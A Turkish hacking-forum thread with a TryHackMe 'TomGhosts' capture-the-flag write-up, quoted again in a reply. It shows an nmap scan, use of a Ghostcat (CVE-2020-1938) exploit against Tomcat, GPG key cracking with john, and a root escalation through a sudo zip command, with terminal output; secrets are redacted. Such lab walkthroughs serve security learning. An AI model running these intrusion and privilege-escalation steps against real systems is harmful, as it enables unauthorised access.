TryHackMe | TomGhost Çözümü

GökBörü.

Uzman üye
20 Haz 2021
1,815
5
1,049
Kara Harp Okulu
9x1hxd2.png


TryHackMe | TomGhosts

Selamun Aleyküm , TryHackMe'de bulunan TomGhosts adlı CTF'i çözücez fazla uzatmadan konuya geçelim.

8plvdgc.png


CTF Linki:TryHackMe

Seviye:

shp4vi9.png


f4j1r6w.png



İşleme her zamanki gibi nmap taraması yaparak başlıyorum.


j44i6i6.png



Nmap kullanarak bağlantı noktalarını tarayarak başlayacağız. Bu nedenle, 22 numaralı bağlantı noktasında çalışan ssh, 8009'da bir Apache Java sunucusu ve 8080'de çalışan Apache Tomcat 9.0.30'a sahibiz

Tarayıcımızdan bi bakalım



4dv5krc.png


fh40tmz.png



bu kısımda ben fazla odaklanmadım siteye standart bi site normal ben bu açığa CVE-2020–1938 Ghosts odaklanıp ilerledim


searchsploit ile exploiti arıyoruz.


tcavlfa.png



48143.py exploitimizi indirip çalıştırıyoruz.


mhgtep2.png


skyfuck:Olan kısım bizim SSH bağlantımızı yapacak olan password not alın ilerde lazım olacak.

SSH Bağlantımızı yapmayı deneyelim.



qvczdcp.PNG


evet bağlantımızı sağladık aynı komutları uygulayın user flagını almış olucaksınız şimdi sıra geldi root flagını bulmaya.


n5clo1e.png


ls -la komutuyla dizinlerdeki dosyalarımızı listeleyelim tryhackme.asc dosyasını görüyorsunuz.


dizindeki dosyalarmızı kendi makinamıza kaliye aktarıp bakalım içerisine.



226auwm.png


Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg2john tryhackme.asc > Hash.txt                                                     
File tryhackme.asc
cat Hash.txt
gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd28af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc




hashes şifremizi kırmak için JHON aracını kullanıcaz

Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt Hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]        (tryhackme)
1g 0:00:00:00 DONE (2022-08-21 19:20) 8.333g/s 8933p/s 8933c/s 8933C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.




şifremizi kırdık redacted olan kısım şifremiz ben write up olarak paylaşacağım için gizledim.

İlk olarak , tryhackme.gpgdosyayı gpg içine almamız gerekiyor


Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg --import tryhackme.asc               
" not changed
gpg: key 8F3DA3DEC6707170: secret key imported
" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1




Artık crackli credential.pgp kullanarak dosyanın şifresini çözebiliriz.

Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg --decrypt credential.pgp             
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
"
merlin:[REDACTED]




evet şifremizi aldık.

şimdi SSH bağlantımızda yetkimizi yükseltelim.


Kod:
skyfuck@ubuntu:~$ su merlin[/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]Password:
sudo -l
Matching Defaults entries for merlin on ubuntu:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
  (root : root) NOPASSWD: /usr/bin/zip




Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


Bu komutlarımızı çalıştırarak root flagımızı alıcaz.

Kod:
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
root@ubuntu# whoami
root
root@ubuntu# cat /root/root.txt
THM{REDACTED}


pylkils.PNG


Son Kısımlarda ss almadım write up olarak eklemek için.

Evet dostlar CTF'imiz bu kadardı başka bir CTF çözümünde görüşmek dileği ile sağlıcakla kalın.



5t36e7x.png


t80h3tn.png
o37e0rf.png




4rybi7i.PNG


"Keskin Feraset ,
~Keramete Nal Toplatır.~

🇹🇷 ~ GökBörü ~ 🇹🇷
 
Son düzenleme:

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
9x1hxd2.png


TryHackMe | TomGhosts

Selamun Aleyküm , TryHackMe'de bulunan TomGhosts adlı CTF'i çözücez fazla uzatmadan konuya geçelim.

8plvdgc.png


CTF Linki:TryHackMe

Seviye:

shp4vi9.png


f4j1r6w.png



İşleme her zamanki gibi nmap taraması yaparak başlıyorum.


j44i6i6.png



Nmap kullanarak bağlantı noktalarını tarayarak başlayacağız. Bu nedenle, 22 numaralı bağlantı noktasında çalışan ssh, 8009'da bir Apache Java sunucusu ve 8080'de çalışan Apache Tomcat 9.0.30'a sahibiz

Tarayıcımızdan bi bakalım



4dv5krc.png


fh40tmz.png



bu kısımda ben fazla odaklanmadım siteye standart bi site normal ben bu açığa CVE-2020–1938 Ghosts odaklanıp ilerledim


searchsploit ile exploiti arıyoruz.


tcavlfa.png



48143.py exploitimizi indirip çalıştırıyoruz.


mhgtep2.png


skyfuck:Olan kısım bizim SSH bağlantımızı yapacak olan password not alın ilerde lazım olacak.

SSH Bağlantımızı yapmayı deneyelim.



qvczdcp.PNG


evet bağlantımızı sağladık aynı komutları uygulayın user flagını almış olucaksınız şimdi sıra geldi root flagını bulmaya.


n5clo1e.png


ls -la komutuyla dizinlerdeki dosyalarımızı listeleyelim tryhackme.asc dosyasını görüyorsunuz.


dizindeki dosyalarmızı kendi makinamıza kaliye aktarıp bakalım içerisine.



226auwm.png


Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg2john tryhackme.asc > Hash.txt                                                     
File tryhackme.asc
cat Hash.txt
gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd28af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc





hashes şifremizi kırmak için JHON aracını kullanıcaz

Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt Hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]        (tryhackme)
1g 0:00:00:00 DONE (2022-08-21 19:20) 8.333g/s 8933p/s 8933c/s 8933C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.





şifremizi kırdık redacted olan kısım şifremiz ben write up olarak paylaşacağım için gizledim.

İlk olarak , tryhackme.gpgdosyayı gpg içine almamız gerekiyor


Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg --import tryhackme.asc               
" not changed
gpg: key 8F3DA3DEC6707170: secret key imported
" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1





Artık crackli credential.pgp kullanarak dosyanın şifresini çözebiliriz.

Kod:
┌──(root㉿kali)-[~][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]└─# gpg --decrypt credential.pgp             
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
"
merlin:[REDACTED]





evet şifremizi aldık.

şimdi SSH bağlantımızda yetkimizi yükseltelim.


Kod:
skyfuck@ubuntu:~$ su merlin[/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER][/SIZE][/CENTER]
[SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER][SIZE=5][CENTER]Password:
sudo -l
Matching Defaults entries for merlin on ubuntu:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
  (root : root) NOPASSWD: /usr/bin/zip





Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


Bu komutlarımızı çalıştırarak root flagımızı alıcaz.

Kod:
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
root@ubuntu# whoami
root
root@ubuntu# cat /root/root.txt
THM{REDACTED}


pylkils.PNG


Son Kısımlarda ss almadım write up olarak eklemek için.

Evet dostlar CTF'imiz bu kadardı başka bir CTF çözümünde görüşmek dileği ile sağlıcakla kalın.



5t36e7x.png


t80h3tn.png
o37e0rf.png




4rybi7i.PNG


"Keskin Feraset ,
~Keramete Nal Toplatır.~

🇹🇷 ~ GökBörü ~ 🇹🇷
Ellerine saglik
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.